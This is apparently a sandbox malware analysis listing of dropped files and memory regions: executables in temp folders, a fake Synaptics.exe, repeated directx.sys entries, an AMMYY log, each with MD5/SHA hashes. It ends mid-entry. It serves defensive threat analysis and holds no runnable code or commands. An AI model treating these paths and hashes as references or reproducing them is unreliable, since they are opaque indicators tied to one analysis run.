C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 58178700e2f7914aedfd11fb577a63a0 |
| SHA1 | 87c773a2392c142bb5b4e5db73be7103f45cd82f |
| SHA256 | 33912895c35a081e4995bb6f9974c04a6b00f529514cab23b181bf72704df4f6 |
| SHA512 | 3d4f92594fe876b39c0d2e79a2f6f254cf93037a6ecda2d9e51f039e21c11c51bf2fdb2e141ed52d048036c4397c1d288d6c6f59b5709fd6d8c1c780d9c18999 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | daa8f67a577d6952d844ed0bc9fcb106 |
| SHA1 | c9339419695645a02130b1bc8490abe64765fcb4 |
| SHA256 | 1679137361d5696d0421c2ac15b56963d00e684635d3d004c42daf26c6dee4ef |
| SHA512 | d7fe0ad63ee68cb7c75456ca5ccf7e8aa8986bf188b5fd9659e4ce3b8e6645eaa028adf3f07dc0377455dbf006e56da7242dbdd68b326d79ec43be5c12559473 |
memory/3220-2205-0x00000000065B0000-0x00000000065FC000-memory.dmp
memory/3712-2227-0x000000006F0B0000-0x000000006F0FC000-memory.dmp
memory/3220-2237-0x00000000075D0000-0x0000000007673000-memory.dmp
memory/3220-2217-0x000000006F0B0000-0x000000006F0FC000-memory.dmp
memory/3620-2239-0x000000006F0B0000-0x000000006F0FC000-memory.dmp
memory/1624-2250-0x000000006F0B0000-0x000000006F0FC000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe
| MD5 | b3834900eea7e3c2bae3ab65bb78664a |
| SHA1 | cf5665241bc0ea70d7856ea75b812619cb31fb94 |
| SHA256 | cc35b0641c3c85446892311031369a42990c019c7b143b875be5c683e83ff3ce |
| SHA512 | ae36ab053e692434b9307a21dcebe6499b60a3d0bca8549d7264b4756565cb44e190aa9396aea087609adaeb1443f098da1787fd8ffe2458c4fa1c5faea15909 |
C:\Windows\directx.sys
| MD5 | a5f9082adf4db96426c657ca60f6809a |
| SHA1 | aa2d0e0a6342710a98605636e07ad6fe41b0e27f |
| SHA256 | 73a9f3e1fe8b0984d08acf309e5ccbc7f717b42ea5251f712b8da8f33926f8ad |
| SHA512 | 50d0a7280b12ca0dac36b35c13576a1d3e5b5bed9ccd079d2d3b0a34db8462f7b7b61f20e72612b65b6c2dc613f3a970bd33c590cc59033ed6bb7894877e6484 |
memory/2252-2532-0x0000000000400000-0x0000000000AD0000-memory.dmp
memory/4708-2550-0x0000000000080000-0x00000000002E1000-memory.dmp
memory/2252-2568-0x0000000000400000-0x0000000000AD0000-memory.dmp
C:\ProgramData\AMMYY\aa_nts.log
| MD5 | 9e5a8822fe99336922970cf445a46470 |
| SHA1 | 5dbc6fa3264249ca47524fba6f2942f9abbd7ffc |
| SHA256 | 97ba8549d7cda421592a621ced0a7bfb22bdbee3e47630019f9f7747af810d12 |
| SHA512 | 3129c3e217a5415823c4680a58f96db8b8d5611c80d314f7fbb45d52889bfa3a2a0b690b9ac9c4286336c5fca6cde67ec1394439f3fbf0a80b7fbe377a416a2d |
C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
| MD5 | 7b5e89271f2f7e9a42d00cd1f1283d0f |
| SHA1 | 8e2a8d2f63713f0499d0df70e61db3ce0ff88b4f |
| SHA256 | fd51fd3388f72dd5eef367bd8848a9e92ae1b218be128e9e75dffdf39ed9438a |
| SHA512 | 3779e92bd1d68644ceb2ef327c7d24667e13d8c927df3f77ec3b542278538b424ea2fa58a7c03554f7bec245e0ba7702853d8d520c528745dafd67653234ab22 |
C:\Windows\directx.sys
| MD5 | 93f0dc7a8d6f9ca9030fa2b648da15af |
| SHA1 | 208cd7fa780028d83e386cc35d025f413553f8e4 |
| SHA256 | 99c2e0ba313cb7775a9676b0c070204ab5efb3cecfd6086dfb7346c0caaa0855 |
| SHA512 | ce5021d45a5f24315d7b1b92ca17b34b12064d919082aa9070a6a7a39abb5a707a87e8f6967b6667abab129b13def7bf17cf5e2a1faf939d2bb467bda3b940df |
C:\Users\Admin\AppData\Local\Temp\1004192001\zq6a1iqg.exe
| MD5 | fd636191c054ea1e9f60d45bb50eaafc |
| SHA1 | 351cda4cd5f58d474126f5a60f92d4296f28121e |
| SHA256 | d8efa36e63e09c7999fa217695f94d05e6ba642588f5a9c8f5807c8c816b93c1 |
| SHA512 | 0e4c0f02081bc77115479f136aa2bbd5a8ec6f1d83119b74ceec3a3ee98116c1557623328095a32fd99d380b9f43b519933e307f333f5c6b927774587fb07436 |
C:\Windows\directx.sys
| MD5 | a3ff7597316d1d28ef00e3169a122e75 |
| SHA1 | 73a485924da02640d7e0cc787dd9be6441d45b06 |
| SHA256 | 730e4de956166d32eb46d9d15719f975afb2b755fa6c7bdd6ae4f6026b6bb117 |
| SHA512 | 5400dcbb810e3725acec47cb3b1c24d08271c0bd685e36c3f2849b4eaf63a3b6c102ba1109fb593b39b895b166bed0f88bac733cf2ac4efbb482420807eadcdd |
memory/3788-3139-0x0000000000050000-0x000000000029E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1004411001\c4d922dfc8.exe
| MD5 | 7b61c4450718e164ef24eeaa347876b3 |
| SHA1 | 7dd322d0cbd66ba5732421c0829b9de2ca93c3a8 |
| SHA256 | 12118dc0b2fdfab013e7bb8c8d2f8525fe09d738f82277811cb8ba6515b9c012 |
| SHA512 | 6b0e3e61fb0dcada99996b3a30a6880c18b9a222a95d46a9008fd1fb6a7c5df8a43fd430fd4c0880a0422ec1d0ec29fd28e566f13e24ccbf3c027fd2306be6ee |
C:\Windows\directx.sys
| MD5 | 301a88827fc6014c82abfaa047b4df9c |
| SHA1 | b63dbda1d8c6a426400215ba544432094532851b |
| SHA256 | 6e5fb109a6939cd3eeb1bb395a83ff4e1dc5ca0026f9686c10e252623bc8bdd0 |
| SHA512 | c2629a1033257d9549cc1caccfb8bb519b2b4c0b4d3465c55f76ae4ce7e9d0856d4945e0ef5272568fdf2fb02913b229f559021179f13085f57e0fc9a292100f |
memory/4712-3207-0x0000000000E00000-0x0000000001481000-memory.dmp
memory/4712-3235-0x0000000000E00000-0x0000000001481000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1004412001\b6b0ba96bf.exe
| MD5 | b7f493cfc8681282fffbb4ed0813a470 |
| SHA1 | 7886d311595a551786307a1542fbef74265ba88a |
| SHA256 | 3cffd3d15cacfae9a60ad6bf2ddde8468f07a852402004d3bc8043b2489f7953 |
| SHA512 | 535073ab85d9a46a8addd6027e79d4778fa1453f6d903763e18e429b1cb513de1b60fb410bc320d7de1a91f8c36ed68a9037b87300b4f8900f74523e971410cc |
C:\Windows\directx.sys
| MD5 | c73946eb3d77982ba5b697d3faf6991d |
| SHA1 | 435eac1156e91c84a16f62c3dcb3b9cf73099b21 |
| SHA256 | e22c9edce75f8941b513f315e19e0d71d24ca7855b28eeec49d5d373ab43310f |
| SHA512 | 2e9d62f824f5eb1326bd80b68d9b75ecd1edfca392afd4155505dfac153370dd3123db858d943de3d9ea9ca117092c60c0673aa99fc9b231c155078ab63f138c |
memory/3788-3438-0x0000000005200000-0x000000000540E000-memory.dmp
memory/3788-3441-0x0000000004C80000-0x0000000004CA2000-memory.dmp
memory/3788-3440-0x0000000005410000-0x00000000055E0000-memory.dmp
C:\Users\Admin\tbtnds.dat
| MD5 | 6147c7ed5cace95256226438451931fe |
| SHA1 | 51fdc22437f4f64e1332d7510036223976aefef7 |
| SHA256 | 5c0458327b3175f7209566aa0bc4dc90999cdd802c1304ef933b3acf088f18e7 |
| SHA512 | a84ef91a1d80044797b5b0c219ec7d7f0c9fda726d6d32c838032aaff1a4dc11a9be3bbc733f309a5e4521fcfb6389ae6cac5308a4f3f1efcfdc020b3f8e7318 |
C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe
| MD5 | 2e0af351f63d046026cea2616654f05c |
| SHA1 | 78c58cd85e76d489607c0ecb4e34fb08d47dc2c2 |
| SHA256 | acfe487c53dc359b3d0e6c78d8a063c5426b09470e161f26d6f27b97fe5b6623 |
| SHA512 | 1534d56c2d5d419e67e375be30039d28c6e6854415eb79f7a5705639d77471f2899791402313e0ac508351f9f777d57f0bfc25ec027bab70c7af5dce212a5661 |
C:\Windows\directx.sys
| MD5 | 52edfc40284d0bb61841573f62660b74 |
| SHA1 | 17c8d1e7162a8f6b65b16e47e1887182f15a599d |
| SHA256 | 772781688958a8c40beb2aa94494367822a3d40c783dc15cf82d33ed32bc07a4 |
| SHA512 | 3e2cda4b5638c5fdac062fae2ece60e3ca9036293d38bb149b7cc638cf6ee57ca91799626e14820df67a964621ff06677c0e56a572b5d165212e711185a725cc |
C:\Users\Admin\AppData\Local\Temp\Files\backd00rhome.exe
| MD5 | ef397426691bc35566bc401598e10d60 |
| SHA1 | 40ac43354d2ea80706dae6a60ce5cb668ba35514 |
| SHA256 | ec34977344bded135083b97756df058d33565bb80a1ab48cccb82999a6b340cf |
| SHA512 | 023009d6a0b923d582a84a6db93b4b4a5c8017ef2217937490e83df801c56b12a962ba88ec4f28bb1fc2aee7ad393d8c93bd097e27b969f061876ac85339e746 |
C:\Windows\directx.sys
| MD5 | 0df9d88ed712840229bac062e768645b |
| SHA1 | a92673436bdf064fe89552424ed26a764ab1f8a0 |
| SHA256 | 4dc8e151103fc5e509c882129f19118a40f5af63b9e5e18112aeac8955558ed1 |
| SHA512 | 96ef9d82a87799a2f5588aacd0f0c870b073c59e7641b567bda6158eb03b1e62fb617f0eec9dca36604bcdf5ed3fbb799f47323b06df170af34e667831c71f89 |
C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe
| MD5 | 88783a57777926114b5c5c95af4c943c |
| SHA1 | 6f57492bd78ebc3c3900919e08e039fbc032268a |
| SHA256 | 94132d9dde2b730f4800ee383ddaa63d2e2f92264f07218295d2c5755a414b6a |
| SHA512 | 167abcc77770101d23fcc5cd1df2b57c4fe66be73ea0d1fde7f7132ab5610c214e0af00e6ff981db46cd78e176401f2626aa04217b4caf54a249811bbf79d9c6 |
C:\Windows\directx.sys
| MD5 | 7d3b4766b3a797695752c5fb0f081297 |
| SHA1 | 2230c67e7d65ba3af1daa7ce9f59b0498eac0e94 |
| SHA256 | ed2b4e3eb13976d508a921f1aff9ee83cb91697a444605c21f809d57f5655c2d |
| SHA512 | e4cc4bec96e4c13950c21fb4403f08c5d643915ae502a4b36c8ddd6fce1c5cbe5ed739d2e456e82d9fb35810a944ea93aba9f3ea522e7bc682eb0d9a82766749 |
C:\Users\Admin\AppData\Local\Temp\513022960.exe
| MD5 | cb8420e681f68db1bad5ed24e7b22114 |
| SHA1 | 416fc65d538d3622f5ca71c667a11df88a927c31 |
| SHA256 | 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea |
| SHA512 | baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf |
C:\Users\Admin\AppData\Local\Temp\287511317.exe
| MD5 | 96509ab828867d81c1693b614b22f41d |
| SHA1 | c5f82005dbda43cedd86708cc5fc3635a781a67e |
| SHA256 | a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744 |
| SHA512 | ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca |
C:\Users\Admin\AppData\Local\Temp\154057176.exe
| MD5 | c38ea1b0838858f21ea572f60c69de0c |
| SHA1 | f5e34c47b0630056ba00df97641926f9579b384a |
| SHA256 | cae7ef69cce550af020bfc474c6e035882383b022d63e926c52bd8c3ad1d78e4 |
| SHA512 | f9c55f31b9466c412711462322c167aadb72492d70fe5fe89ab5500b86eae8f42de29bc3e469b3f73eab9dd47061b51410d5bee444da0bad719c94c897c59d72 |
C:\Users\Admin\AppData\Local\Temp\Files\test11.exe
| MD5 | 2340185f11edd4c5b4c250ce5b9a5612 |
| SHA1 | 5a996c5a83fd678f9e2182a4f0a1b3ec7bc33727 |
| SHA256 | 76ad6d0544c7c7942996e16fee6ef15aed4b8b75deb3c91551a64635d4455031 |
| SHA512 | 34e863e001845e8117b896f565a020e70963b19d029b5e2bba89049be5eadae1abe06859a527bf29b86008a903c3879c63d680f9d1e1d264d238869cf14f232c |
C:\Windows\directx.sys
| MD5 | 9004aaf4c8aa0c451cb3577abcf93cca |
| SHA1 | 741f084178be603b1dc21f8de09d7162c9376460 |
| SHA256 | 803c2be615cdc0d9278326f35c2ea36259f4c632ce8733331c8b0aef4109e358 |
| SHA512 | 2cd0a00cf3ffe3a93401b16305d647b9716d7c6a187a2ba47413737488edea0cb05e28fa7ca3921eb20d8ab46ae24cf9901ca1e80e22f9f4c395a3af510b3f1d |
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe
| MD5 | fd2defc436fc7960d6501a01c91d893e |
| SHA1 | 5faa092857c3c892eab49e7c0e5ac12d50bce506 |
| SHA256 | ba13da01c41fa50ec5e340061973bc912b1f41cd1f96a7cae5d40afc00ff7945 |
| SHA512 | 9a3e1f2dc5104d8636dc27af4c0f46bdb153fcfada98831b5af95eeb09bb7ef3c7e19927d8f06884a6837e10889380645b6138644f0c08b9cb2e59453041ec42 |
C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
| MD5 | dd4f9e2e3a884356b781bc7085c81fe7 |
| SHA1 | b22baae11f42f5091bb9e8c68e37c70ed73bcf27 |
| SHA256 | 44ea7026de94c08fe8fb19cf6c659f571afd12ef5f6b4cc5c1e6b0ea50e10a39 |
| SHA512 | b02f0f07b6376ea8793498bce77c7150812d691117e5bed8d25a2dbceffc1b51df39896b398b24980767acb9952b299f054faf9622911d637639784e81e21b7e |
C:\Windows\directx.sys
| MD5 | d4158538459216a49005f13522287ab4 |
| SHA1 | 1561a8ff857aeff922ad312a433b82d05bd0f811 |
| SHA256 | 9ab2b7626e4ed628c98c8a0627d69f70890ad9b7c12da6ee085f4732c99610ae |
| SHA512 | 101af0b96b60b0c1725c9eb56c96591325cd674e59bfdbf7a5a97952f9ff0482005908986b904b2dd2dfb1a4472ab4e1eb66704403aa2082be3594a3254260bd |
C:\Windows\directx.sys
| MD5 | 02b4435638707096118cf856ba8c9e07 |
| SHA1 | 53649cee68d14ce570450cd0888dcacd0fa91260 |
| SHA256 | 5ee5d469976feca168eb09d215accf0ec60fb692621eaef2df92ada3ee08aa2e |
| SHA512 | 62049fdf1f4ffe897cb4cb0e7c461f183402707aee6f001037b4c35f4e3bcc1e60cd55126abc41e2cb29d4c1ddcedd55fe4b26376bc9357a65733d82e8feabf9 |
C:\Users\Admin\AppData\Local\Temp\520429473.exe
| MD5 | 83a784716728ca579619d0e13a9f17b0 |
| SHA1 | 5e33ca9dab3c0df2edcd597b8b0da06c88f18f6b |
| SHA256 | 9dc0b007f33f768fff2249388428981d89cfcee3e5babd206bbaeb7d5cc34b4f |
| SHA512 | f8218a8e977f0ec340e7139041cfff8bac4cc23bcea0c0c0d7717ead76093d45d10acd72a5846486e9348ce642f529824f1575d0d28b8d2f566c543c7c9d3bc4 |
C:\Users\Admin\AppData\Local\Temp\Files\AdaptorOvernight.exe
| MD5 | e0d29de6e2fa7590f857f1ef825c943c |
| SHA1 | 5d4166175a6aeadad97a01f856856cc87a482311 |
| SHA256 | 47fa886618e66e730a11f7a37be8ab0371709624a0ad26e7370c0220bdd4786d |
| SHA512 | 190c08889a5085bc38d8cc8689eb6dc461338f80496cda05068b20940053a4df6330a35ae651c8cdc325e090a87b5b097dfae7ead64d39dda3cca1a03fedba5e |
C:\Windows\directx.sys
| MD5 | 0c9dc2bd3c511fc4a321970c73f52420 |
| SHA1 | 4d30534848e588b4f0dc61fefb94fde801f71e2f |
| SHA256 | 1b8bdf1de551c7988c135cd845ba45c777e544eefa2eee0298840aa8c9a43874 |
| SHA512 | a759f2d457def1f3be15c820b9246288fd027cc6b14b0112f3e08b1d91cb36132b4b19e59995dcb87b5ecdf6642553e18ca1b65fdb408627fa23443bc5ee19b6 |
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
| MD5 | 9b8a01a85f7a6a8f2b4ea1a22a54b450 |
| SHA1 | e9379548b50d832d37454b0ab3e022847c299426 |
| SHA256 | 3a8d25489569e653336328538ff50efcd5b123ceeb3c6790211e2e546a70ce39 |
| SHA512 | 960ba08c80d941205b1c2b1c19f2c4c3294118323097019f1cfc0300af9c8f2c91661fa1817a5573e37c0cdf3cae1f93c91b2934353709999c9efb05cda2130f |
C:\Windows\directx.sys
| MD5 | 020c633b2f3813a6a41c536b9b00fba2 |
| SHA1 | 1af40a264a53272f8a675234807b394b7c954579 |
| SHA256 | 5e8984758fe67646cbbd5c987d2e043881ffac8c1cc131349962dfd588219312 |
| SHA512 | 870954f5026c7e7c01a53b3e1a876cb162b7351e33b445c3c6c4d92903d501c646cdde1a910a20fa3d903745996141ff9b7b792fbba3030761ad4dff05fe3e48 |
C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.ba\SideBar.png
| MD5 | ca62a92ad5b307faeac640cd5eb460ed |
| SHA1 | 5edf8b5fc931648f77a2a131e4c733f1d31b548e |
| SHA256 | f3109977125d4a3a3ffa17462cfc31799589f466a51d226d1d1f87df2f267627 |
| SHA512 | f7b3001a957f393298b0ff2aa08b400f8639f2f0487a34ac2a0e8d9519765ac92249185ebe45f907bc9d2f8556fdd39095c52f890330a35edf71ae49df32e27a |
C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe
| MD5 | 833d7b73767607cd76c0c81dcc1c5f75 |
| SHA1 | 6ad561dcfcdea749d2f7d3fc96fca99d7f6fe592 |
| SHA256 | abb2e915cae562e527cd773e5b399d993634331ad29bea029cc2048ae239fbda |
| SHA512 | 33dbf44e6dd06fdf114628d8c34fb7eea13f5cfe3a1a461b76dc0ae0dfde7ba4b17e0835d75fd6a5990893c541f2f3d3781bd80449c42a8a894a1eeb10bda7d1 |
C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe
| MD5 | eb2e78bbb601facb768bd61a8e38b372 |
| SHA1 | d51b9b3a138ae1bf345e768ee94efdced4853ff7 |
| SHA256 | 09d97363cb679a12a09d9795569b38193991362c3b6981d7154b17d34f36f8cf |
| SHA512 | 5c2ce80953a39393a6a63c772390709e2140bf9b7e7a7765767bc5ae6fb27e52fa7f9237a918dd8060a83667f29ed47e12adef26127f183bea58859e93c3b9f4 |
C:\Windows\directx.sys
| MD5 | b870f33192c7bbc1beaaac72a4591b65 |
| SHA1 | b33cd62acf957e6b11895dfc528593b7815b684c |
| SHA256 | 333eb244f5f14057dfa08b14d001faaa5c1960d8942097802b799cd6ec5bc6e4 |
| SHA512 | 36a2a38222434efb04c33ff0a760adeddb0b692e1cb597faab7406b2f23db94ec6d741fedf6bb7dcb5477463a6d1b2fa26f87a83cbde3586c50b8b1dc03dba65 |
memory/2792-5585-0x0000000000810000-0x0000000000818000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\System.exe
| MD5 | 3d2c42e4aca7233ac1becb634ad3fa0a |
| SHA1 | d2d3b2c02e80106b9f7c48675b0beae39cf112b7 |
| SHA256 | eeea8f11bf728299c2033bc96d9a5bd07ea4f34e5a2fbaf55dc5741b9f098065 |
| SHA512 | 76c3cf8c45e22676b256375a30a2defb39e74ad594a4ca4c960bad9d613fc2297d2e0e5cc6755cb8f958be6eadb0d7253d009056b75605480d7b81eb5db57957 |
C:\Windows\directx.sys
| MD5 | cea38347dfd84253c90b7d7d77b2ce99 |
| SHA1 | 4b07ed3f30824d4500b3eb858801219b7e390aa7 |
| SHA256 | 681b777f08ac59a41687fe714db2412057030e74ba3af545f4f297d3bf783560 |
| SHA512 | 038714f92cb02b61c9767561818f977bf11f1c9c44b0a47cc3b772e1737e41f59e20d8bf0bd667ab17df1157dadeb69e3e6be16a852872299864f1726a0bcd5c |
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe
| MD5 | 44e17821665477b21d6c50cee97c84ef |
| SHA1 | 4fc146790747758f49f1fd4375144f000099a6cb |
| SHA256 | 5adac427a6eff8b0c1674c6095e2719d5ee46945fd4e397384af02b8ec691045 |
| SHA512 | ab98a8151b41b56d7e59c375541c366df2f83c01ee26a5d1f079f74fb69eac4d229df62d3900eb8db6fd8cae1e420c21b7b9b2b3a44a8b135cb6659b6b70b6dc |
C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe
| MD5 | 8c423ccf05966479208f59100fe076f3 |
| SHA1 | d763bd5516cddc1337f4102a23c981ebbcd7a740 |
| SHA256 | 75c884a8790e9531025726fd44e337edeaf486da3f714715fa7a8bdab8dbabe3 |
| SHA512 | 0b94558cbfd426300673b4d98e98a9408de236fe93bb135fa07e77ee0851621bfc9a5129322f31c402a606ab1952eb103de483c3b48a86c3225318d98f78bc20 |
C:\Windows\directx.sys
| MD5 | f881efefaf9160053b058d38c3839c66 |
| SHA1 | 4cf3a30cc6cd1dbee3faf118cffb8b935dc41b6c |
| SHA256 | c8425fe24e7990fe55a744130afa951ff4bbb54239a8488d41e99bc7b0d54eb2 |
| SHA512 | 3268852d0f1c78966481f7e34592db916c659d7f3e1177774daf144e4953a05139ce645dc0d1764432d7b9ea94758c96ad93e6b5ae1ce148a356277d8c4ba7a1 |
memory/4604-5965-0x00000000002E0000-0x0000000000332000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tmp6FB0.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
C:\ProgramData\Synaptics\Synaptics.exe
| MD5 | 075045f176129f6b11d627db7c7a3c76 |
| SHA1 | d815d313d2882041b8adb063eda6a8bd62149443 |
| SHA256 | 86586abd265e12fc63222aff947d6acb4f3d28b148f9c5abc5d548d74795f9c8 |
| SHA512 | 86e9aff5e3cde31a9a553108f833003a9d905c1a1c1db72dca80cf0816ddabe63d18b8d7a616717c2f01f10148bc06915af0b9c4222305d5681d29d3b9d9198b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | b856d79054d0c3bba9d112f22f3d13cc |
| SHA1 | 5c1912baaa6d5c248a71bc69e3e47dc063c4c262 |
| SHA256 | df6e2dac1342ec7d84bb1bc62a5208b8180c17a65871e941a76394e54bf7a3d9 |
| SHA512 | 5b9c254e940a2343da74d2ff2ab199dbe006c4fcb7f764469ef6fe32d32fb7ef9b730330b931297f0cd5127deb3272b9498c3d62d33a7354e977c1289dec6158 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 93461b35879f6b1ee1a30044179ec58f |
| SHA1 | 1d9975cfb968a4e3f419cf1bf620a764ac77fd51 |
| SHA256 | 0c9065be1f6aeb056503bdbd9dcc6077317789e3bdbee33b64d0fa00468cc98a |
| SHA512 | 0c1f3e4b273507a915c9bb0a3d6f546557b7cba5c08f2706f823a76c65299c3268395f21458ca166309506f7d9b0da14701a6c4c569a688732999cde3a2b5720 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDNFODSHT6QENOUBMNUC.temp
| MD5 | d1dbe15d6e0097c68f863bc8d7ea9f21 |
| SHA1 | 8daca1ecd29f632fe44b9c08008d3ecfe2e4cb6b |
| SHA256 | 5e3cda961fc12362abdea08ab8c0adc80ed2af7d97803e26f3495843ba4aa6c5 |
| SHA512 | d589938d4f76daa8b2401370b2005ca151c87cb011be60e5c0122368eb85723d77c19c19f0756126bb073c33fcbdce92d32b95bc0b0b496b6306aa9e67997378 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | d8fc5fa0f99361678cc7a33224146359 |
| SHA1 | 9bce5d6759a749c17a5ed1407bba76dd326d2311 |
| SHA256 | ffb303a1205f5ce4159f4697fc10dc68c3097168b173b8d5196e3cf47e345658 |
| SHA512 | 9929b58037e6930b67b4807b536151e6a253414357f212b748a1653cff1e5857149d937c97813a2ba17e9af113b14ea02cd65f2b9421490892229d7b06e5fea2 |
C:\Users\Admin\AppData\Local\Temp\9E8E5E00
| MD5 | 6f93dad005c10fabfa2257bf3adf00dd |
| SHA1 | a52fe6428c4b631e35c58b1ef9a99935d40010b5 |
| SHA256 | e88608c300243b2b05bc962adc6a4f3a7ad073dfd9eafef1c9555bee181c950b |
| SHA512 | 081aefc89d2b2bd5a55152bc08e0c4e8ff875bcd961a24e1b2d1fa247a06360cfc3ced0182e8ff765a99d865e362da435e41eacc5bc26bcd352108ebdfeced96 |
C:\Users\Admin\AppData\Local\Temp\Files\Team.exe
| MD5 | 2f208b17f8bda673f6b4f0dacf43d1bf |
| SHA1 | 5131b890e8f91770039a889e72464b5ce411c412 |
| SHA256 | 1fc3e92f7f30f4f68861d3ceb8284853ae30c11cbd0ed3e46ea9eb698b3ec348 |
| SHA512 | 2830984abc5476e23609c947304f1124fd33f38e654b98bccbcde44e7fbadb75584983243e83a006b69403ac3d42ab379e1665989bec368320efdd5e98ad62df |
C:\Windows\directx.sys
| MD5 | c5e9da989ca59a964c0dcae134443a4b |
| SHA1 | cd7afbbee826cf0238dffcbeadb943c8e3f903b3 |
| SHA256 | 90518bf9c2e8eaeafebda5104ede1eb7f956e13f929e80e45c0628dc697acefe |
| SHA512 | 71e8aa97bbe6ff5156f05f93ba7c6f13af882d135a4d7f175dbb2f33c47bd0e48122ac9e311537acbc60b876ead23be0de563c4b0c6f52526588e117e1046a99 |
C:\Users\Admin\AppData\Local\Temp\Files\test10.exe
| MD5 | 0f0e9f3b9a70d62ae4bc66a93b604146 |
| SHA1 | e516287a1a99aac6c296083a4545a6a6981a9352 |
| SHA256 | f38408d7e7dd4873930980fedfa841d515d3b4e12a7f33ba1d384c627186afda |
| SHA512 | 42940fc6103c07ee8d113fe46aff26d34cb53c8244bb60e1763efafb295ed7197133ef270dc0709641b8403aeee257119ed0492b0efcccf0607109f1e2112881 |
C:\Windows\directx.sys
| MD5 | f622e88b52599e3f74c303953984bf98 |
| SHA1 | 39bdb50bd99675e7e4c5064662a0048d47906a82 |
| SHA256 | 6ab1fcae830dce462f2b61c094191e6dfed001fb6ba670ef1a91451dd3ed3c5b |
| SHA512 | c0d86148e28a705f1efd0819e0b808a5b38f07bcd3353289e462b256b42e2359f662df78e87302d1122b99c0acb80a9fe97ace990d41bcb985319399379a337a |
C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe
| MD5 | 564be60ec38590b61733648812b66536 |
| SHA1 | 881f071bee59ba856b45a1fe11e7ed1d2123b017 |
| SHA256 | d9b41aeaaf67efd6370b267ab33dc39f149cbe9fd3f6dec30734f360e8ebfc6c |
| SHA512 | 2b6bed6c03b30cb659ad87c47328a853d73ec06cf48dff3472e9d7cf5a91cb7d5bace4b0c96df193a9c624dca796c580f4fd1f782fad2fbce280b8f018272c90 |
C:\Windows\directx.sys
| MD5 | c969ede1d34e53d4ee4174f3d036b225 |
| SHA1 | 4667ce3cf83e5642759b522e270bacfd9c9e9e5f |
| SHA256 | 37371f0f4112550712b06db9c023a2f2f16f6d1adb7a3045ac02dd52eb062fc0 |
| SHA512 | 144ef0150986b03bba205c633ff4051da4ecfe04ac215bb2f412df084978ae221d987712f0f3dadbf0a145e5d029dbbcf97bb291fbc2243e94ef90d8cbc8524d |
C:\Users\Admin\AppData\Local\Temp\Files\test6.exe
| MD5 | 6383ec21148f0fb71b679a3abf2a3fcc |
| SHA1 | 21cc58ccc2e024fbfb88f60c45e72f364129580f |
| SHA256 | 49bf8246643079a1ec3362f85d277ce13b3f78d8886c87ee8f5a76442290adde |
| SHA512 | c6866039fc7964737cd225709930470e4efe08dc456b83b5b84d9f136c7d0734d2cce79f3b36c7c8e4b1559b2348c8fca981b2cce05f1c0b8f88ec7c7f532125 |
C:\Windows\directx.sys
| MD5 | 7291858227ad8025b569d59412dab0f7 |
| SHA1 | b923bbe20f138250c1ed4622bb87704adb8814f4 |
| SHA256 | 595612e204ddf6e2f6b4aec44c29c9e868927033c987588864852762029efef2 |
| SHA512 | ec3e6f69c6e811558a30b5fe18b405529d91e6779c3a9aabf30bea11941576defaa8224158c1cb170c077b0e7b254bff5546cac21ec63970c13200fce181e779 |
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
| MD5 | ffc2637acde7b6db1823a2b3304a6c6c |
| SHA1 | 8eac6fb5415f9338b1b131c42ed15ea70da22096 |
| SHA256 | 35efc0520b78a1b413afee5dbe5d8b0674eea2acfc7d943de70a99b5b2fd92ef |
